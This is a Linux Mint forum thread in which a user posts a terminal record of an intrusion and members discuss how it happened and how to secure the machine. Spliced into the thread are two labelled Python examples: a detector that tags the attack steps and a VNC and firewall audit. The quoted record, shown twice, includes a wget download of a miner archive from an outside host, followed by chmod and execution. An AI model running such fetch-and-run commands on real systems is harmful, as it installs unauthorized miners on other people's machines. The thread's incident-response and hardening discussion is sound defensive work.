How did I get hacked? - Solved

PPPeter
Level 1
Posts: 9
Joined: Wed Feb 07, 2018 6:14 am

How did I get hacked? - Solved

Post by PPPeter » Wed Feb 07, 2018 6:35 am

Hi all, hoping someone can help me with some security advice.

I recently installed Linux Mint Cinnamon 18.3 on one of my boxes. I left it running overnight with an open Terminal window (I was running Handbrake on a bunch of my DVDs). The following morning I found evidence in the Terminal window that I had been hacked - the commands below had been run (I've omitted the output from the commands as there was a lot of it):

peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $

I've done some searching and this appears to be an attempt to hijack my PC to mine some crypto currency (Monero or Aeon, not sure). Anyway, the "screen" command failed (not installed) and the shell script x.sh issued a whole load of error messages so the hacker was out of luck.

I don't have anti-virus installed (I know, big mistake, but lesson learned) but I still don't understand how I got hacked. I only installed software from the Software Centre, and I only visited reputable sites mainly to get info on how to do things in Linux.

I switched the box off (after copying the evidence to another server) and will be reinstalling Linux Mint afresh before I use it again. I'm looking for advice on how to protect myself better, e.g. what anti-virus to install, and anything else I can do.

Thanks in advance.
Last edited by PPPeter on Wed Feb 07, 2018 11:36 am, edited 1 time in total.
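An added example, not part of PPPeter's post or of anything else in this thread: a small Python detector run over the transcript above. It tags the staging steps visible there (hardware recon, a dot-named directory under /tmp, an archive download, chmod +x on everything, a detach attempt, execution from /tmp) and the mistyped-then-retyped command that later replies treat as the sign of a human operator. The sample transcript is the one pasted above with output omitted; the tag names are my own.

```python
import re
# Constructed sample: the command sequence reported in the first post, output omitted.
SAMPLE = """\
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
"""
PROMPT = re.compile(r"^\S+@\S+ (\S+) \$ ?(.*)$")  # user@host cwd $ command
def parse_transcript(text):
    """Return (cwd, command) pairs from prompt lines; command output lines are skipped."""
    pairs = []
    for line in text.splitlines():
        m = PROMPT.match(line)
        if m and m.group(2).strip():
            pairs.append((m.group(1), m.group(2).strip()))
    return pairs
def one_char_off(a, b):
    """Same length, exactly one differing character: a command mistyped and then retyped."""
    return len(a) == len(b) and sum(x != y for x, y in zip(a, b)) == 1
def analyse(pairs):
    """Tag each command with the staging step it resembles and summarise the distinct steps."""
    tags = []
    for i, (cwd, cmd) in enumerate(pairs):
        prog, *args = cmd.split()
        in_tmp = cwd.startswith("/tmp")
        if prog == "lspci" or (prog == "cat" and "/proc/cpuinfo" in args):
            tags.append(("hardware_recon", cmd))     # sizing the box before picking a miner
        if prog in ("mkdir", "cd") and in_tmp and args and args[-1].startswith(".") and args[-1] != "..":
            tags.append(("hidden_dir_in_tmp", cmd))  # '...' and '.x' do not show in a plain ls
        if prog in ("wget", "curl") and args and re.search(r"\.(tgz|tar\.gz|zip|sh)$", args[-1]):
            tags.append(("archive_download", cmd))
        if prog == "chmod" and "+x" in args and "*" in args:
            tags.append(("mass_chmod_exec", cmd))
        if prog in ("screen", "tmux", "nohup"):
            tags.append(("detach_attempt", cmd))     # keep the process alive after logout
        if prog.startswith("./") and in_tmp:
            tags.append(("exec_from_tmp", cmd))
        if i + 1 < len(pairs) and one_char_off(cmd, pairs[i + 1][1]):
            tags.append(("typo_then_retry", cmd))    # a human at the keyboard, not a script
    steps = sorted({t for t, _ in tags})
    return {"tags": tags, "steps": steps, "interactive": "typo_then_retry" in steps}
```

The same parser works on a saved ~/.bash_history only if the prompt is present; for a bare history file, pass each line as the command with an empty cwd.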

PPPeter
Level 1
Posts: 9
Joined: Wed Feb 07, 2018 6:14 am

Re: Not another Mint anti virus question.

Post by PPPeter » Wed Feb 07, 2018 7:04 am

Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.

Don't say anti-virus is unnecessary, it most definitely is necessary

Moem
Level 13
Posts: 4823
Joined: Tue Nov 17, 2015 9:14 am
Location: The Netherlands

Re: Not another Mint anti virus question.

Post by Moem » Wed Feb 07, 2018 7:14 am

PPPeter wrote: Why do so many people say that you don't need anti-virus for Linux?
Because it's true.

And even if it's true that you got hacked, that is a very different thing than a virus. Let's not confuse things.

If your issue is solved, kindly indicate that by editing the first post in the topic, and adding [SOLVED] to the title. Thanks!

Pjotr
Level 19
Posts: 9639
Joined: Mon Mar 07, 2011 10:18 am
Location: The Netherlands (Holland)

Re: Not another Mint anti virus question.

Post by Pjotr » Wed Feb 07, 2018 7:15 am

PPPeter wrote: Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.

Don't say anti-virus is unnecessary, it most definitely is necessary
More proof please.

And even if you could supply this proof: why do you think that AV would have protected you against this hijack attempt?
Last edited by Pjotr on Wed Feb 07, 2018 7:48 am, edited 1 time in total.
Tip: 10 things to do after installing Linux Mint 18.3 Sylvia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.

Cosmo.
Level 22
Posts: 16628
Joined: Sat Dec 06, 2014 7:34 am

Re: Not another Mint anti virus question.

Post by Cosmo. » Wed Feb 07, 2018 7:29 am

PPPeter wrote: After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.
This would have been the most stupid attacker, if he demonstrates his activity in such an obvious way. Actually this looks like somebody had local access. No AV would be able to do something against that. - And you seem to have made the mistake of not at least locking your screen overnight.

Or with another attempt to interpret your post: If you should really have done nothing except what you described, then it would mean that the attack had been built inside of your system. Think about it.
If I look at your other post / thread, then it is obvious that what you wrote here (installed nothing from outside of the official repositories) is simply untrue. Think about that also.

Pjotr
Level 19
Posts: 9639
Joined: Mon Mar 07, 2011 10:18 am
Location: The Netherlands (Holland)

Re: How did I get hacked?

Post by Pjotr » Wed Feb 07, 2018 7:34 am

A hacking attempt has nothing to do at all with a virus. So antivirus certainly wouldn't have helped against this. I advise removing that newly installed AV from your system, because it'll only make it less secure.

It looks like a local attack: somebody who had physical access to your computer. If you leave the computer on during your absence, make sure that your screen is locked with a password.

Or even better: lock the room in which you've put your computer, because physical access will always remain a risk. No matter what.

Keep your system fully updated, don't install stuff from non-official repos, be careful with browser add-ons, sandbox some high-risk applications (web browsers!) with Firejail and above all: use your common sense. Do all that, and then: relax, you're running Linux. :mrgreen:

Pjotr
Level 19
Posts: 9639
Joined: Mon Mar 07, 2011 10:18 am
Location: The Netherlands (Holland)

Re: Not another Mint anti virus question.

Post by Pjotr » Wed Feb 07, 2018 7:47 am

This is the link to the separate topic that PPPeter has started for his problem:
viewtopic.php?f=18&t=263447

--Edit: rectified.
Last edited by Pjotr on Wed Feb 07, 2018 7:56 am, edited 2 times in total.

Cosmo.
Level 22
Posts: 16628
Joined: Sat Dec 06, 2014 7:34 am

Re: Not another Mint anti virus question.

Post by Cosmo. » Wed Feb 07, 2018 7:51 am

This thread is what I mentioned in my last sentence.

Pjotr
Level 19
Posts: 9639
Joined: Mon Mar 07, 2011 10:18 am
Location: The Netherlands (Holland)

Re: Not another Mint anti virus question.

Post by Pjotr » Wed Feb 07, 2018 7:55 am

Cosmo. wrote: This thread is what I mentioned in my last sentence.
Yes, sorry, my wording was inexact. I'll rectify my previous message.

Cosmo.
Level 22
Posts: 16628
Joined: Sat Dec 06, 2014 7:34 am

Re: How did I get hacked?

Post by Cosmo. » Wed Feb 07, 2018 7:55 am

The line alone where "chmod" was mistyped at first makes it obvious that there was a human at work.

tdockery97
Level 14
Posts: 5026
Joined: Sun Jan 10, 2010 8:54 am
Location: Salem, Oregon

Re: How did I get hacked?

Post by tdockery97 » Wed Feb 07, 2018 7:57 am

You may want to turn your firewall on also. :wink:
Linux Mint 18.3 KDE

PPPeter
Level 1
Posts: 9
Joined: Wed Feb 07, 2018 6:14 am

Re: Not another Mint anti virus question.

Post by PPPeter » Wed Feb 07, 2018 7:59 am

Proof: these are the commands (output omitted for brevity) I found in the terminal window:
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $

I agree, it must have been a very stupid attacker. And no, it was not someone sitting at the computer, unless they broke into my property while I was asleep and did nothing other than sit at my PC and run a few commands. Yes, I did leave the computer unlocked - a mistake I won't make again. Clearly you guys think I'm trolling; I'm not, I'm just relaying my experience. Maybe you are right, maybe anti-virus wouldn't have helped, in which case please tell me what would have helped. And don't insinuate that I am lying. I don't even know how to install anything outside of the software center and I have never accessed my email accounts in Linux.

PPPeter
Level 1
Posts: 9
Joined: Wed Feb 07, 2018 6:14 am

Re: How did I get hacked?

Post by PPPeter » Wed Feb 07, 2018 11:05 am

Thanks for the replies. I am 100% certain it was not a local attack, I live alone and my property is secure. I haven't yet installed an anti-virus, perhaps I don't need to. I will certainly be more security conscious in future and shutdown the PC whenever I am not physically present. I only left it on as I was running Handbrake in batch mode. That's all done now.

Re switching on firewall, Steve Gibson's "Shields Up" gives my router a "perfect TruStealth" rating, whatever that means. Do I need to configure anything in Linux for a firewall?

Thanks again.

Pierre
Level 16
Posts: 6131
Joined: Fri Sep 05, 2008 5:33 am
Location: Perth, AU.

Re: How did I get hacked?

Post by Pierre » Wed Feb 07, 2018 11:27 am

The firewall in Linux Mint is installed, but not turned on:

Open a Terminal and type

    sudo ufw status

and that will tell you if the firewall is active or not. If it isn't, then type

    sudo ufw enable
Please edit your original post title to include [SOLVED] - when your problem is solved!
and DO LOOK at those Unanswered Topics - - you may be able to answer some!.

PPPeter
Level 1
Posts: 9
Joined: Wed Feb 07, 2018 6:14 am

Re: How did I get hacked? - Solved

Post by PPPeter » Wed Feb 07, 2018 11:36 am

Great stuff. Thanks very much!

thx-1138
Level 4
Posts: 498
Joined: Fri Mar 10, 2017 12:15 pm
Location: Athens, Greece

Re: Not another Mint anti virus question.

Post by thx-1138 » Wed Feb 07, 2018 11:40 am

https://www.virustotal.com/#/file/21587 ... /detection
So you can be certain that AV wouldn't have helped...

...it appears to be a Monero miner btw:
https://github.com/fireice-uk/xmr-stak

greerd
Level 5
Posts: 839
Joined: Sat Jul 31, 2010 10:58 am
Location: Nova Scotia, Canada

Re: Not another Mint anti virus question.

Post by greerd » Wed Feb 07, 2018 11:49 am

PPPeter wrote (Wed Feb 07, 2018 7:59 am):

I don't see how remote access would open or leave open a terminal window on your desktop by using ssh or any terminal access. The only way that this could be done (afaik) is to use a VNC program that logs into DESKTOP:0.

You mentioned in an earlier post that you searched for info on vnc, did you go through setting up Desktop Sharing (vino)? If so did you leave it enabled and leave all security settings unchecked?

The firewall in Mint isn't enabled by default, was it enabled (to default allow-out, deny-in) during your episode?
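An added example, not from greerd or anyone else in the thread: a Python audit of the two things asked about above, the Vino desktop-sharing security options and the ufw state. The key names are those I know from the org.gnome.Vino gsettings schema (enabled, prompt-enabled, require-encryption, authentication-methods, use-upnp); the two sample outputs are constructed to look like a box where sharing was switched on with every security box left unchecked and the firewall never enabled.

```python
# Constructed sample output of `gsettings list-recursively org.gnome.Vino`.
VINO_DUMP = """\
org.gnome.Vino enabled true
org.gnome.Vino prompt-enabled false
org.gnome.Vino require-encryption false
org.gnome.Vino authentication-methods ['none']
org.gnome.Vino use-upnp true
"""
# Constructed sample output of `sudo ufw status` at Mint's default.
UFW_INACTIVE = "Status: inactive\n"

# key -> (value considered safe, why it matters); assumed org.gnome.Vino schema keys
VINO_EXPECTED = {
    "prompt-enabled": ("true", "each incoming viewer must be approved on screen"),
    "require-encryption": ("true", "VNC traffic otherwise travels in the clear"),
    "authentication-methods": ("['vnc']", "'none' admits anyone who can reach port 5900"),
    "use-upnp": ("false", "UPnP opens the VNC port on the home router"),
}

def parse_gsettings(dump):
    """Map key -> value from `gsettings list-recursively` lines (schema key value)."""
    settings = {}
    for line in dump.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) == 3:
            settings[parts[1]] = parts[2]
    return settings

def audit(vino_dump, ufw_status):
    """Return (findings, fixes): weak settings found and the commands that harden them."""
    s = parse_gsettings(vino_dump)
    findings, fixes = [], []
    if s.get("enabled") == "true":          # a disabled Vino is not listening at all
        for key, (safe, why) in VINO_EXPECTED.items():
            if s.get(key) != safe:
                findings.append(f"vino {key}={s.get(key)}: {why}")
                fixes.append(f'gsettings set org.gnome.Vino {key} "{safe}"')
    if not ufw_status.startswith("Status: active"):
        findings.append("ufw inactive: nothing limits inbound connections to port 5900")
        fixes.append("sudo ufw enable")
    return findings, fixes

if __name__ == "__main__":
    for line in audit(VINO_DUMP, UFW_INACTIVE)[0]:
        print(line)
```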

chrisuk
Level 5
Posts: 527
Joined: Thu Jun 12, 2008 6:16 am

Re: How did I get hacked? - Solved

Post by chrisuk » Wed Feb 07, 2018 12:09 pm

Assuming that I've not misunderstood your post:

Just to dispel the myth... Linux is not magically immune to malware, you're just less likely to be infected in Linux than Windows. Note the "less likely", regardless of what others will continually tell you, it is not impossible.

Now, if you are 100% certain that nobody had physical access to your machine, and you don't have multiple personalities (I'm being serious, some people have such an illness) - then you were either hacked or you have a Poltergeist. Either way, it warrants further investigation. If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.

However, I suspect that someone was following an online guide... they never made it to the "Erasing your tracks" section - and the fact you can see all those commands reinforces the idea that they didn't know what they were doing.

So I suggest that you copy/paste your post to other forums more focused on security. You may never find out what happened, and it may never happen again, but you might get a meaningful explanation of what and why... though not who ;)
Chris

Manjaro MATE - MX Linux - LMDE MATE

Ozo
Level 4
Posts: 487
Joined: Tue Dec 22, 2015 11:49 am
Location: Titusville, Florida USA

Re: How did I get hacked? - Solved

Post by Ozo » Wed Feb 07, 2018 12:38 pm

Don't be gullible. This poster just signed on so has no history on this forum. My conspiracy theory is that they made this up as they could not actually hack Linux themselves. This could be an attempt at spreading fear among the users. I for one am not afraid which is one reason I can see right through stuff like this.

I apologize to the OP if I am wrong but I do not believe in coincidence.

Pjotr
Level 19
Posts: 9639
Joined: Mon Mar 07, 2011 10:18 am
Location: The Netherlands (Holland)

Re: How did I get hacked? - Solved

Post by Pjotr » Wed Feb 07, 2018 12:58 pm

chrisuk wrote (Wed Feb 07, 2018 12:09 pm): If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.
Nobody said that.

@Ozo: that thought has crossed my mind as well.
